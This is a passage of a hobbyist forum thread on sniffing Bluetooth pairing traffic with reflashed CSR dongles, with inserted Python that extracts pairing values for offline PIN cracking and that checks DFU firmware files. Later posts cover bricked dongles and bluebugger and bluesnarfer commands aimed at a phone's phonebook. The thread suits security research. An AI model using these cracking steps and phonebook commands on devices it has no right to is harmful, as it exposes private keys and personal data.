> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> ACL data: handle 0 flags 0x02 dlen 10
L2CAP(s): Info req: type 2
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> ACL data: handle 0 flags 0x02 dlen 12
L2CAP(s): Info rsp: type 2 result 1
Not supported
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20

> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20



As you can see hcidump partially understands this, but doesn't know the op codes so just displays HCI event.

You have to tell hcidump what manufacturer of device you are using. CSR's manuf code is 10 so we add this to hcidump and ...



HCI sniffer - Bluetooth packet analyzer ver 1.41
> HCI Event: Vendor (0xff) plen 20
LMP(r): version_res(m): op code 38
VersNr 3 (2.0)
CompId 10 (Cambridge Silicon Radio)
SubVersNr 3164
> HCI Event: Vendor (0xff) plen 20
LMP(s): host_connection_req(m): op code 51
> HCI Event: Vendor (0xff) plen 20
LMP(r): accepted(m): op code 3
op code 51 (host_connection_req)
> HCI Event: Vendor (0xff) plen 20
LMP(r): setup_complete(s): op code 49
> HCI Event: Vendor (0xff) plen 20
LMP(s): packet_type_table_req(m): op code 127/11
packet type table 1 (2/3Mbps)
> HCI Event: Vendor (0xff) plen 20
LMP(s): set_AFH(m): op code 60
AFH_instant 0x5072c
AFH_mode 1
AFH_channel_map 0xffffffffffffffffff7f
> HCI Event: Vendor (0xff) plen 20
LMP(r): accepted_ext(m): op code 127/1
op code 127/11 (packet_type_table_req)
> HCI Event: Vendor (0xff) plen 20
LMP(s): channel_classification_req(m): op code 127/16
AFH reporting mode 1
AFH min interval 0x0640
AFH max interval 0xbb80
> HCI Event: Vendor (0xff) plen 20
LMP(s): in_rand(m): op code 8
random number c93ebf1f5c9a7362a80a72414dfabeb1
> HCI Event: Vendor (0xff) plen 20
LMP(r): accepted(m): op code 3
op code 8 (in_rand)
> HCI Event: Vendor (0xff) plen 20
LMP(s): comb_key(m): op code 9
random number 0f34da046545e5a15a11639d71a067b6
> HCI Event: Vendor (0xff) plen 20
LMP(r): comb_key(m): op code 9
random number 8e429e343d0c330f1c00071806389c87
> HCI Event: Vendor (0xff) plen 20
LMP(s): au_rand(m): op code 11
random number 54fba1db6e2d0aabda8a06b9ff0a2ae8
> HCI Event: Vendor (0xff) plen 20
LMP(r): sres(m): op code 12
authentication response 1c890d81
> HCI Event: Vendor (0xff) plen 20
LMP(r): au_rand(m): op code 11
random number 760affcf59bec9e178556145a01ab630
> HCI Event: Vendor (0xff) plen 20

LMP(s): sres(m): op code 12
IN_RAND c93ebf1f5c9a7362a80a72414dfabeb1
COMB_KEY 0f34da046545e5a15a11639d71a067b6 (M)
COMB_KEY 8e429e343d0c330f1c00071806389c87 (S)
AU_RAND 54fba1db6e2d0aabda8a06b9ff0a2ae8 SRES 1c890d81 (M)
AU_RAND 760affcf59bec9e178556145a01ab630 SRES b2b6be7f (S)
authentication response b2b6be7f

> HCI Event: Vendor (0xff) plen 20
LMP(s): setup_complete(m): op code 49
> HCI Event: Vendor (0xff) plen 20
LMP(s): max_slot(m): op code 45
max slots 5
> HCI Event: Vendor (0xff) plen 20
LMP(s): max_slot_req(m): op code 46
max slots 5
> HCI Event: Vendor (0xff) plen 20
LMP(s): auto_rate(m): op code 35
> HCI Event: Vendor (0xff) plen 20
LMP(r): auto_rate(s): op code 35
> HCI Event: Vendor (0xff) plen 20
LMP(r): max_slot(s): op code 45
max slots 5
> HCI Event: Vendor (0xff) plen 20
LMP(r): timing_accuracy_req(s): op code 47
> HCI Event: Vendor (0xff) plen 20
LMP(r): accepted(m): op code 3
op code 46 (max_slot_req)
> HCI Event: Vendor (0xff) plen 20
LMP(s): timing_accuracy_res(s): op code 48
drift 250
jitter 10
> ACL data: handle 0 flags 0x02 dlen 10
L2CAP(s): Info req: type 2
> HCI Event: Vendor (0xff) plen 20
LMP(s): timing_accuracy_req(m): op code 47
> HCI Event: Vendor (0xff) plen 20
LMP(r): timing_accuracy_res(m): op code 48
drift 250
jitter 10
> HCI Event: Vendor (0xff) plen 20
LMP(r): feature_req(s): op code 39
features 0xff 0xff 0x8f 0xfe 0x9b 0xf9 0x00 0x80
> HCI Event: Vendor (0xff) plen 20
LMP(s): clkoffset_req(m): op code 5
> HCI Event: Vendor (0xff) plen 20
LMP(s): feature_res(s): op code 40
features 0xff 0xff 0x8d 0xfe 0x9b 0xf9 0x00 0x80
> ACL data: handle 0 flags 0x02 dlen 12
L2CAP(s): Info rsp: type 2 result 1
Not supported
> HCI Event: Vendor (0xff) plen 20
LMP(r): clkoffset_res(m): op code 6
clock offset 0x34d4
> HCI Event: Vendor (0xff) plen 20
LMP(r): name_req(s): op code 1
name offset 0
> HCI Event: Vendor (0xff) plen 20
LMP(s): supervision_timeout(m): op code 55
supervision timeout 9600
> HCI Event: Vendor (0xff) plen 20
LMP(s): name_res(s): op code 2
name offset 0
name length 8
name fragment 'LG KG290'
> HCI Event: Vendor (0xff) plen 20
LMP(s): name_req(m): op code 1
name offset 0
> HCI Event: Vendor (0xff) plen 20
LMP(r): name_res(m): op code 2
name offset 0
name length 11
name fragment 'drgr33n (0)'
> HCI Event: Vendor (0xff) plen 20
LMP(s): preferred_rate(m): op code 36
data rate 0x70
Basic: use FEC, no packet-size preference
EDR: use 3 Mbps packets, use 5-slot packets
> HCI Event: Vendor (0xff) plen 20
LMP(s): decr_power_req(m): op code 32
future use 0x00


I've removed a lot of the L2CAP packets, but now hcidump understands the op codes and displays all the info needed to crack the link key ;) A lot easier to spot :D

Hope this helps a few people out as it saved me a good half hour :D I will add something to bluesmash later but I've been so busy lately I've barely got time for a coffee !!!!
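Even decoded, the listing above still has to be read by eye to find the five values that matter (the post's own IN_RAND / COMB_KEY / AU_RAND / SRES summary was assembled by hand). Below is an added example, not code from the thread or from bluesmash: a Python parser for `hcidump -V` text (for the CSR case above the decode command is `hcidump -V -m 10 -r out`, `-m` being hcidump's `--manufacturer` option) that pulls those values out in protocol order and also answers the question a practitioner needs answered before reaching for BTCrack. The offline PIN search needs the pairing itself: per PIN guess it recomputes Kinit = E22(PIN, BD_ADDR, IN_RAND), unmasks both LK_RANDs from the COMB_KEYs, derives the link key Kab through E21, and checks E1(Kab, AU_RAND, BD_ADDR) against the captured SRES. A capture of two phones that are already paired shows only AU_RAND/SRES (re-authentication with the stored link key), and no PIN can be recovered from that. The master/slave labels follow the post's own convention (LMP(s) is M, LMP(r) is S); SAMPLE_PAIRING is an excerpt of the dump above and SAMPLE_REAUTH is a constructed excerpt.

```python
"""Extract legacy-pairing values from `hcidump -V` LMP output.

Added example, not from the thread. SAMPLE_PAIRING is an excerpt of the post's
decoded dump; SAMPLE_REAUTH is constructed. Direction labels follow the post:
LMP(s) is the master (M), LMP(r) the slave (S).
"""
import re

# "LMP(s): in_rand(m): op code 8" -> direction s/r, PDU name, transaction id m/s, op code
LMP_RE = re.compile(r"LMP\(([sr])\):\s*(\w+)\((m|s)\):\s*op code\s*([\d/]+)")
# the hex payload line that follows an in_rand/comb_key/au_rand/sres header
VALUE_RE = re.compile(r"(random number|authentication response)\s+([0-9a-fA-F]+)")

ROLE = {"s": "master", "r": "slave"}


def parse_lmp(text):
    """List of LMP PDUs in capture order; `value` is the hex payload where one exists."""
    pdus, pending = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = LMP_RE.search(line)
        if m:
            pending = {"dir": m.group(1), "name": m.group(2), "tid": m.group(3),
                       "opcode": m.group(4), "value": None}
            pdus.append(pending)
            continue
        v = VALUE_RE.search(line)
        if v and pending is not None and pending["value"] is None:
            pending["value"] = v.group(2).lower()
    return pdus


def pairing_material(text):
    """IN_RAND, both COMB_KEYs and every AU_RAND/SRES pair, in the order the PIN
    search consumes them:
      Kinit     = E22(PIN, BD_ADDR, IN_RAND)      (BD_ADDR per the spec's fixed/variable PIN rule)
      LK_RAND_x = COMB_KEY_x XOR Kinit,  LK_K_x = E21(LK_RAND_x, BD_ADDR_x)
      Kab       = LK_K_master XOR LK_K_slave
      SRES'     = E1(Kab, AU_RAND, BD_ADDR of the responder); PIN found when SRES' == SRES
    The E22/E21/E1 (SAFER+) arithmetic itself is what BTCrack does; it is not done here."""
    mat = {"in_rand": None, "comb_key": {}, "challenges": []}
    open_challenge = None
    for p in parse_lmp(text):
        role = ROLE[p["dir"]]
        if p["name"] == "in_rand":
            mat["in_rand"] = p["value"]
        elif p["name"] == "comb_key":
            mat["comb_key"][role] = p["value"]
        elif p["name"] == "au_rand":
            open_challenge = {"challenger": role, "au_rand": p["value"], "sres": None}
        elif p["name"] == "sres" and open_challenge and role != open_challenge["challenger"]:
            # the SRES answering a challenge always comes from the other side
            open_challenge["sres"] = p["value"]
            mat["challenges"].append(open_challenge)
            open_challenge = None
    return mat


def pin_crackable(mat):
    """True only if the capture holds the pairing itself, not just a re-authentication."""
    return (mat["in_rand"] is not None
            and set(mat["comb_key"]) == {"master", "slave"}
            and any(c["sres"] for c in mat["challenges"]))


def summary_lines(mat):
    """Render the values the way the post's hand-written summary does."""
    lines = ["IN_RAND %s" % mat["in_rand"]]
    for role, tag in (("master", "M"), ("slave", "S")):
        if role in mat["comb_key"]:
            lines.append("COMB_KEY %s (%s)" % (mat["comb_key"][role], tag))
    for c in mat["challenges"]:
        tag = "M" if c["challenger"] == "master" else "S"
        lines.append("AU_RAND %s SRES %s (%s)" % (c["au_rand"], c["sres"], tag))
    return lines


SAMPLE_PAIRING = """> HCI Event: Vendor (0xff) plen 20
    LMP(s): in_rand(m): op code 8
    random number c93ebf1f5c9a7362a80a72414dfabeb1
> HCI Event: Vendor (0xff) plen 20
    LMP(r): accepted(m): op code 3
    op code 8 (in_rand)
> HCI Event: Vendor (0xff) plen 20
    LMP(s): comb_key(m): op code 9
    random number 0f34da046545e5a15a11639d71a067b6
> HCI Event: Vendor (0xff) plen 20
    LMP(r): comb_key(m): op code 9
    random number 8e429e343d0c330f1c00071806389c87
> HCI Event: Vendor (0xff) plen 20
    LMP(s): au_rand(m): op code 11
    random number 54fba1db6e2d0aabda8a06b9ff0a2ae8
> HCI Event: Vendor (0xff) plen 20
    LMP(r): sres(m): op code 12
    authentication response 1c890d81
> HCI Event: Vendor (0xff) plen 20
    LMP(r): au_rand(m): op code 11
    random number 760affcf59bec9e178556145a01ab630
> HCI Event: Vendor (0xff) plen 20
    LMP(s): sres(m): op code 12
    authentication response b2b6be7f
> HCI Event: Vendor (0xff) plen 20
    LMP(s): setup_complete(m): op code 49
"""

# constructed: two already-paired devices re-authenticating with their stored link key
SAMPLE_REAUTH = """> HCI Event: Vendor (0xff) plen 20
    LMP(s): au_rand(m): op code 11
    random number 54fba1db6e2d0aabda8a06b9ff0a2ae8
> HCI Event: Vendor (0xff) plen 20
    LMP(r): sres(m): op code 12
    authentication response 1c890d81
"""

if __name__ == "__main__":
    for sample in (SAMPLE_PAIRING, SAMPLE_REAUTH):
        mat = pairing_material(sample)
        print("\n".join(summary_lines(mat)), "\ncrackable:", pin_crackable(mat), "\n")
```

Run it as `hcidump -V -m 10 -r out | python3 lmpvals.py` (with the script reading stdin instead of SAMPLE_PAIRING) on a fresh capture; if `pin_crackable` comes back False, the devices were already bonded when you started sniffing and you need to force a fresh pairing (delete the bond on one side) before capturing again.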

DeadWolf
06-12-2008, 07:15 PM
Dr_GrEeN, Is there a major difference between CSR firmware versions 46 and 49 used in your video? And what's the difference between say versions airsnifferdev46bc2.dfu and airsnifferdev46bc3.dfu, and airsnifferdev46bc4.dfu?

Does the bc2, bc3, and bc4 correspond with the Bluecore#? (i.e. BC4 = Bluecore4)

imported_=Tron=
06-13-2008, 06:23 AM
Does the bc2, bc3, and bc4 correspond with the Bluecore#? (i.e. BC4 = Bluecore4)

Yes I believe so, as I tried it with a BC2 bluetooth dongle, and had to choose the airsnifferdev46bc2.dfu for it to fit.

aggtrfrad
06-16-2008, 03:58 PM
Hola,
Here's my story (please read :P)
- got my a7eng USB dongle today
- changed product ID to 0002, restarted, works perfectly in raw mode
- my stupidity gets in the game
- I wanted to upgrade the firmware so I could use it on Windows/Frontline, so I said let's use Frontline's tool to upgrade the firmware. Started the tool, selected device, selected firmware (airsnifferdev47bc2.dfu), device changes automatically to DFU mode (dev id: ffff), I'm asked to install new drivers, starting upgrade, at the end of the upload I get an error: verification failed, maybe firmware doesn't match device
- device stays in DFU mode, devid: ffff
- I plugged it back into Linux, hciconfig cannot see it, bccmd cannot see it as HCI (also tried a USB serial connection but no luck), dfutool can successfully see it but:
- it cannot start downloading firmware FROM the dongle TO my PC
- it can start uploading firmware FROM my PC TO the dongle, but at the end it just says "Waiting for Device" and quits
- device still in the same state
- I also tried to restore the old firmware with Frontline's tool, it starts uploading but at the end says device not responding
- conclusion: I'm sorry if I wasn't clear but it's a very screwed up case.
edit:
- hciconfig revision showed CSR BC2 external
- I saved the original firmware before flashing

imported_=Tron=
06-16-2008, 04:07 PM
You should be able to restore your old firmware on the dongle in linux using dfutool and your backup.

aggtrfrad
06-16-2008, 04:19 PM
Thank you, I tried and it starts uploading, at the end I get no errors at all.
But nothing changes, even if I replug the dongle...
dev id still "ffff" instead of "0001", and no HCI tools can see it as an HCI device.
I'm trying to connect to it via bccmd, but since it is not an HCI device, I'm trying to connect directly by a serial connection but no luck.
dmesg shows that when I plug the device in, it doesn't point to any file at all.
I will post the exact output of dmesg when I reboot to Linux.

aggtrfrad
06-18-2008, 10:08 AM
You should be able to restore your old firmware on the dongle in linux using dfutool and your backup.

I figured out that my backup has ASCII code at the end of the file.
I think that's why my dongle will not accept it, dfu ****ed up somehow.
Here's how my backed-up original firmware looks at 98-100%:


000A6340 2D00 2D00 2D00 2D00 2D00 2D00 2D00 0D00 -.-.-.-.-.-.-...
000A6350 0D00 0000 5400 6800 6500 2000 6600 6F00 ....T.h.e. .f.o.
000A6360 6C00 6C00 6F00 7700 6900 6E00 6700 2000 l.l.o.w.i.n.g. .
000A6370 6300 6F00 6D00 6D00 6100 6E00 6400 7300 c.o.m.m.a.n.d.s.
000A6380 2000 6100 7200 6500 2000 7500 6E00 6400 .a.r.e. .u.n.d.
000A6390 6F00 6300 7500 6D00 6500 6E00 7400 6500 o.c.u.m.e.n.t.e.
000A63A0 6400 2000 6100 6E00 6400 2000 6D00 6100 d. .a.n.d. .m.a.
000A63B0 7900 2000 6200 6500 2000 6300 6800 6100 y. .b.e. .c.h.a.
000A63C0 6E00 6700 6500 6400 2000 6F00 7200 2000 n.g.e.d. .o.r. .
000A63D0 7200 6500 6D00 6F00 7600 6500 6400 0D00 r.e.m.o.v.e.d...
000A63E0 0000 6900 6E00 2000 6600 7500 7400 7500 ..i.n. .f.u.t.u.
000A63F0 7200 6500 2000 6600 6900 7200 6D00 7700 r.e. .f.i.r.m.w.
000A6400 6100 7200 6500 2000 7200 6500 7600 6900 a.r.e. .r.e.v.i.
000A6410 7300 6900 6F00 6E00 7300 2E00 0D00 0D00 s.i.o.n.s.......
000A6420 0000 4700 4500 5400 2000 5400 5200 5500 ..G.E.T. .T.R.U.
000A6430 5300 5400 4500 4400 4C00 4900 5300 5400 S.T.E.D.L.I.S.T.
000A6440 3C00 4300 5200 3E00 0D00 0000 5200 6500 <.C.R.>.....R.e.
000A6450 7400 7200 6900 6500 7600 6500 7300 2000 t.r.i.e.v.e.s. .
000A6460 7400 6800 6500 2000 6300 7500 7200 7200 t.h.e. .c.u.r.r.
000A6470 6500 6E00 7400 2000 7400 7200 7500 7300 e.n.t. .t.r.u.s.
000A6480 7400 6500 6400 6C00 6900 7300 7400 2000 t.e.d.l.i.s.t. .
000A6490 7300 6500 7400 7400 6900 6E00 6700 2E00 s.e.t.t.i.n.g...
000A64A0 2000 5400 6800 6900 7300 2000 7600 6100 .T.h.i.s. .v.a.
000A64B0 6C00 7500 6500 2000 7700 6900 6C00 6C00 l.u.e. .w.i.l.l.
000A64C0 2000 6200 6500 2000 4F00 4E00 2000 6900 .b.e. .O.N. .i.
000A64D0 6600 2000 7400 6800 6500 2000 7400 7200 f. .t.h.e. .t.r.
000A64E0 7500 7300 7400 6500 6400 0D00 0000 6C00 u.s.t.e.d.....l.
000A64F0 6900 7300 7400 2000 6900 7300 2000 6300 i.s.t. .i.s. .c.
000A6500 7500 7200 7200 6500 6E00 7400 6C00 7900 u.r.r.e.n.t.l.y.
000A6510 2000 6500 6E00 6100 6200 6C00 6500 6400 .e.n.a.b.l.e.d.
000A6520 2000 6100 6E00 6400 2000 4F00 4600 4600 .a.n.d. .O.F.F.
000A6530 2000 6900 6600 2000 6900 7400 2000 6900 .i.f. .i.t. .i.
000A6540 7300 2000 6400 6900 7300 6100 6200 6C00 s. .d.i.s.a.b.l.
000A6550 6500 6400 2E00 2000 5700 6800 6500 6E00 e.d... .W.h.e.n.
000A6560 2000 7400 6800 6900 7300 2000 7300 6500 .t.h.i.s. .s.e.
000A6570 7400 7400 6900 6E00 6700 2000 6900 7300 t.t.i.n.g. .i.s.
000A6580 2000 7400 7500 7200 6E00 6500 6400 0D00 .t.u.r.n.e.d...
000A6590 0000 6F00 6600 6600 2C00 2000 6900 6E00 ..o.f.f.,. .i.n.
000A65A0 6600 6F00 7200 6D00 6100 7400 6900 6F00 f.o.r.m.a.t.i.o.
000A65B0 6E00 2000 6600 6F00 7200 2000 6E00 6500 n. .f.o.r. .n.e.
000A65C0 7700 6C00 7900 2000 7400 7200 7500 7300 w.l.y. .t.r.u.s.
000A65D0 7400 6500 6400 2000 6400 6500 7600 6900 t.e.d. .d.e.v.i.
000A65E0 6300 6500 7300 2000 6900 7300 2000 6E00 c.e.s. .i.s. .n.
000A65F0 6F00 7400 2000 7000 6500 7200 7300 6900 o.t. .p.e.r.s.i.
000A6600 7300 7400 6500 6400 2E00 0D00 0D00 0000 s.t.e.d.........
000A6610 5300 4500 5400 2000 4D00 4F00 4400 4500 S.E.T. .M.O.D.E.
000A6620 2000 4200 4300 5300 5000 3C00 4300 5200 .B.C.S.P.<.C.R.
000A6630 3E00 0D00 0000 5300 7700 6900 7400 6300 >.....S.w.i.t.c.
000A6640 6800 2000 7400 6800 6500 2000 6D00 6F00 h. .t.h.e. .m.o.
000A6650 6400 7500 6C00 6500 2000 6900 6E00 7400 d.u.l.e. .i.n.t.
000A6660 6F00 2000 4800 4300 4900 2000 6D00 6F00 o. .H.C.I. .m.o.
000A6670 6400 6500 2000 6F00 7600 6500 7200 2000 d.e. .o.v.e.r. .
000A6680 7400 6800 6500 2000 4200 4300 5300 5000 t.h.e. .B.C.S.P.
000A6690 2000 5000 7200 6F00 7400 6F00 6300 6F00 .P.r.o.t.o.c.o.
000A66A0 6C00 2E00 0D00 0D00 0000 5300 4500 5400 l.........S.E.T.
000A66B0 2000 4D00 4F00 4400 4500 2000 4400 4900 .M.O.D.E. .D.I.
000A66C0 4100 4700 4E00 4F00 5300 5400 4900 4300 A.G.N.O.S.T.I.C.
000A66D0 3C00 4300 5200 3E00 0D00 0000 5300 7700 <.C.R.>.....S.w.
000A66E0 6900 7400 6300 6800 2000 7400 6800 6500 i.t.c.h. .t.h.e.
000A66F0 2000 6D00 6F00 6400 7500 6C00 6500 2000 .m.o.d.u.l.e. .
000A6700 6900 6E00 7400 6F00 2000 6400 6900 6100 i.n.t.o. .d.i.a.
000A6710 6700 6E00 6F00 7300 7400 6900 6300 7300 g.n.o.s.t.i.c.s.
000A6720 2000 6D00 6F00 6400 6500 2E00 2000 5400 .m.o.d.e... .T.
000A6730 6800 6900 7300 2000 7700 6900 6C00 6C00 h.i.s. .w.i.l.l.
000A6740 2000 6300 6100 7500 7300 6500 2000 6100 .c.a.u.s.e. .a.
000A6750 2000 6C00 6100 7200 6700 6500 2000 6E00 .l.a.r.g.e. .n.
000A6760 7500 6D00 6200 6500 7200 2000 6F00 6600 u.m.b.e.r. .o.f.
000A6770 0D00 0000 7400 7200 6100 6300 6500 2000 ....t.r.a.c.e. .
000A6780 6D00 6500 7300 7300 6100 6700 6500 7300 m.e.s.s.a.g.e.s.
000A6790 2000 7400 6F00 2000 6200 6500 2000 6F00 .t.o. .b.e. .o.
000A67A0 7500 7400 7000 7500 7400 2000 6100 6C00 u.t.p.u.t. .a.l.
000A67B0 6F00 6E00 6700 2000 7700 6900 7400 6800 o.n.g. .w.i.t.h.
000A67C0 2000 6E00 6F00 7200 6D00 6100 6C00 2000 .n.o.r.m.a.l. .
000A67D0 6300 6F00 6D00 6D00 6100 6E00 6400 2000 c.o.m.m.a.n.d. .
000A67E0 6D00 6F00 6400 6500 2000 6400 6100 7400 m.o.d.e. .d.a.t.
000A67F0 6100 2E00 0D00 0D00 0000 5300 4500 5400 a.........S.E.T.
000A6800 2000 5300 5400 4100 5400 5500 5300 2000 .S.T.A.T.U.S. .
000A6810 6900 6E00 7600 6500 7200 7400 6500 6400 i.n.v.e.r.t.e.d.
000A6820 2000 7C00 2000 6E00 6F00 7200 6D00 6100 .|. .n.o.r.m.a.
000A6830 6C00 3C00 4300 5200 3E00 0D00 0000 5700 l.<.C.R.>.....W.
000A6840 6800 6500 6E00 2000 7300 6500 7400 2000 h.e.n. .s.e.t. .
000A6850 7400 6F00 2000 6E00 6F00 7200 6D00 6100 t.o. .n.o.r.m.a.
000A6860 6C00 2000 7400 6800 6500 2000 5300 5400 l. .t.h.e. .S.T.
000A6870 4100 5400 5500 5300 2000 6C00 6900 6E00 A.T.U.S. .l.i.n.
000A6880 6500 2000 7700 6900 6C00 6C00 2000 6200 e. .w.i.l.l. .b.
000A6890 6500 2000 6100 6300 7400 6900 7600 6500 e. .a.c.t.i.v.e.
000A68A0 2000 6C00 6F00 7700 2E00 2000 5700 6800 .l.o.w... .W.h.
000A68B0 6500 6E00 2000 7300 6500 7400 2000 7400 e.n. .s.e.t. .t.
000A68C0 6F00 2000 6900 6E00 7600 6500 7200 7400 o. .i.n.v.e.r.t.
000A68D0 6500 6400 0D00 0000 7400 6800 6500 2000 e.d.....t.h.e. .
000A68E0 5300 5400 4100 5400 5500 5300 2000 6C00 S.T.A.T.U.S. .l.
000A68F0 6900 6E00 6500 2000 7700 6900 6C00 6C00 i.n.e. .w.i.l.l.
000A6900 2000 6200 6500 2000 6100 6300 7400 6900 .b.e. .a.c.t.i.
000A6910 7600 6500 2000 6800 6900 6700 6800 2E00 v.e. .h.i.g.h...
000A6920 0D00 0D00 0000 3E00 0000 4100 4300 4B00 ......>...A.C.K.
000A6930 0000 6600 6100 6300 7400 6F00 7200 7900 ..f.a.c.t.o.r.y.
000A6940 0000 6F00 6E00 0000 6F00 6600 6600 0000 ..o.n...o.f.f...
000A6950 5300 6100 7600 6900 6E00 6700 2000 6E00 S.a.v.i.n.g. .n.
000A6960 6500 7700 2000 7300 6500 7400 7400 6900 e.w. .s.e.t.t.i.
000A6970 6E00 6700 7300 2000 7400 6F00 2000 6600 n.g.s. .t.o. .f.
000A6980 6C00 6100 7300 6800 0D00 0000 6200 6300 l.a.s.h.....b.c.
000A6990 7300 7000 0000 6400 6900 6100 6700 6E00 s.p...d.i.a.g.n.
000A69A0 6F00 7300 7400 6900 6300 0000 6900 6E00 o.s.t.i.c...i.n.
000A69B0 7600 6500 7200 7400 6500 6400 0000 6E00 v.e.r.t.e.d...n.
000A69C0 6F00 7200 6D00 6100 6C00 0000 4E00 4100 o.r.m.a.l...N.A.
000A69D0 4B00 0D00 0000 3E00 0000 3100 3200 3000 K.....>...1.2.0.
000A69E0 3000 0000 4100 4300 4B00 0D00 0000 3200 0...A.C.K.....2
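Three people in this part of the thread are restoring a firmware backup that the dongle then ignores, so it is worth checking a backup before flashing it at all. A `.dfu` archive ends with a 16-byte DFU suffix (the "UFD" signature, vendor and product IDs, and a CRC over everything before it); readable strings inside the image body, like the command help text in the dump above, do not by themselves make the file bad, and only the last 16 bytes decide whether a DFU tool will accept it. The check below is an added example (editor's code, not from the thread or from BlueZ): the suffix layout is from the DFU 1.0 specification, the CRC convention (the running CRC-32 state without the final inversion) is the one dfu-util implements, and that BlueZ's dfutool writes an identical suffix is an assumption; the payload bytes are constructed.

```python
"""Validate or build the 16-byte suffix that ends a DFU 1.0 (.dfu) archive.

Added example, not from the thread. Suffix layout (DFU 1.0 spec, section 6.2),
in file order, every multi-byte field little-endian:
  bcdDevice(2) idProduct(2) idVendor(2) bcdDFU(2) ucDfuSignature(3)="UFD"
  bLength(1)=16 dwCRC(4)
dwCRC covers the whole file except the CRC field itself and stores the running
CRC-32 state (init 0xFFFFFFFF, poly 0xEDB88320) without the final inversion,
i.e. zlib.crc32(data) ^ 0xFFFFFFFF. That is dfu-util's convention; that BlueZ's
dfutool writes the same suffix is an assumption. SAMPLE_PAYLOAD is constructed.
"""
import struct
import zlib

SUFFIX_FMT = "<HHHH3sBI"
SUFFIX_LEN = struct.calcsize(SUFFIX_FMT)   # 16
SIGNATURE = b"UFD"


def dfu_crc(data):
    """dwCRC as dfu-util computes it: CRC-32 state with no final XOR."""
    return zlib.crc32(data) ^ 0xFFFFFFFF


def make_dfu_file(payload, vendor, product, device=0xFFFF, bcd_dfu=0x0100):
    """Append a valid suffix to a raw image (device 0xFFFF = 'any device revision')."""
    head = struct.pack("<HHHH3sB", device, product, vendor, bcd_dfu, SIGNATURE, SUFFIX_LEN)
    body = payload + head
    return body + struct.pack("<I", dfu_crc(body))


def parse_dfu_suffix(blob):
    """(fields, "ok") for a well-formed archive, otherwise (None, reason)."""
    if len(blob) < SUFFIX_LEN:
        return None, "file is shorter than a DFU suffix"
    device, product, vendor, bcd_dfu, sig, length, crc = struct.unpack(
        SUFFIX_FMT, blob[-SUFFIX_LEN:])
    if sig != SIGNATURE:
        # a raw dump of the flash ends with whatever the image ends with, not "UFD"
        return None, "no UFD signature, last 16 bytes are %r" % blob[-SUFFIX_LEN:]
    if length != SUFFIX_LEN:
        return None, "bLength %d, expected %d" % (length, SUFFIX_LEN)
    expected = dfu_crc(blob[:-4])
    if crc != expected:
        return None, "CRC mismatch: stored 0x%08x, computed 0x%08x" % (crc, expected)
    return {"vendor": vendor, "product": product, "device": device, "bcd_dfu": bcd_dfu}, "ok"


def payload_of(blob):
    """The image without its suffix; only meaningful once parse_dfu_suffix says ok."""
    return blob[:-SUFFIX_LEN]


# constructed stand-in for a firmware image; help strings in the body are normal
SAMPLE_PAYLOAD = (b"\x00\x01CSR firmware image (constructed)\x00"
                  + b"GET TRUSTEDLIST<CR>\r\nSET MODE BCSP<CR>\r\n")

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 \
        else make_dfu_file(SAMPLE_PAYLOAD, 0x0a12, 0x0001)   # 0x0a12 is CSR's USB vendor ID
    fields, why = parse_dfu_suffix(data)
    print(why, fields or "")
```

`python3 dfucheck.py backup.dfu` on a dfutool archive either prints the vendor/product IDs it was made for (compare them with `lsusb` for the dongle) or tells you which of the three things is wrong: no suffix at all, a bad length byte, or a CRC that no longer matches the bytes before it.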

sws2007
06-20-2008, 05:11 PM
Hi aggtrfrad,

I have EXACTLY the same problem, just that I have bricked 3 a7eng 502 dongles so far. It seems that this dongle is not so compatible with this method of changing firmware.

I tried with Frontline and it doesn't get out of DFU mode (ffff)
I tried with dfutool and it doesn't get out of DFU mode (ffff)
Trying to restore the backup firmware is successful, but the device never gets back to 0001, it just stays with ffff

I would like to know if anyone ever got this dongle to work in sniffing mode.

Also, this dongle has different places to write to, and I only figured this out now, when I have no other dongles to play with. It has 0x0000, 0x0001, 0x0003, 0x0004 .. 5, 6, and 0x0007. The values on 0x0004 are not changeable, it seems they are ROM, however, I figured out that I can change it to 0x0002 on 0x0007, 0x0000, 0x0001, 0x0002

Hopefully my next attempt will be successful or some mate will post some solution here.

Thank you all

akamagic
06-24-2008, 07:32 AM
First off, this entire thread has helped a lot, however after about 4 hours of trial and error I'm officially stuck... but sadly I'm afraid I already know the answer, which is to get a dongle that is ext... but as read in previous posts it's not a simple task and easy to brick... so I was just wondering, since I only have a ROM based dongle, if I could get better results. So far I'm at the point where I can finally connect to my phone (RAZR V9m, but hoping I'm just having troubles because it is an up to date phone) after entering my PIN (0000), however sometimes I don't even need to but instead just "accept" (and rarely it just connects without any means of accepting on my phone). The problem is even though I'm connected it doesn't do any of the commands I implement using bluebugger but rather it hangs after it gives me the device and name (while still remaining connected to the phone). For example it hangs even though I use channel 18 (OBEX Phonebook Access profile) and by using the line:
bluebugger -c 18 -a 00:1c:c1:80:15:18 phonebook

same results with bluesnarfer:
bluesnarfer -r A-C -b 00:1c:c1:80:15:18

Everything looks right since I'm connected (unless my phone is lying) but I don't get any results.

PS: I was finally able to connect by using the tip of passkeys/default, typing 0000, and also using hciconfig hci0 piscan and finding the channels which seem appropriate for the commands I try. I'm obviously a noobie so bear with me.... BUT IN SHORT is my only option getting an ext based dongle? Or should I stick with my ROM based one? Thanks in advance

imported_johnjohnsp1
06-24-2008, 03:30 PM
Great tutorial DrGr33n, I have a D-Link Bluetooth DBT-122 dongle and I have a hard time getting it into RAW mode like you do. Here is some of my output:

